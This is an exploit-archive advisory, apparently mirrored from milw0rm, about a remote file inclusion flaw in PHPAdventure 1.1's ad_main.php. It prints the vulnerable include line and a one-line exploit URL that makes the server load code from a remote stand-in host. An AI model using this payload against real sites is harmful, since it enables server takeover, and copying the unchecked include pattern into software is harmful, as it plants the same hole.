Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14968
HistoryNov 08, 2006 - 12:00 a.m.

PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability

2006-11-0800:00:00
vulners.com
8
JSON

D.O.M TEAM
Bug found: HER0
cms: PHPAdventure
type: rfi
risk: High
download:http://prdownloads.sourceforge.net/phpadventure/phpadv11.tar.gz
contac:[email protected]
nota: all the versions of PHPAdventure is affected…

line of the code:

<?php
$_stage = 1;
include($_mygamefile);
?>

exploit:
/ad_main.php?_mygamefile=http://evilcode.txt?

www.domteam.info

greetz:Sponge Bob,Bob esponja XDDDD…

milw0rm.com [2006-11-07]

JSON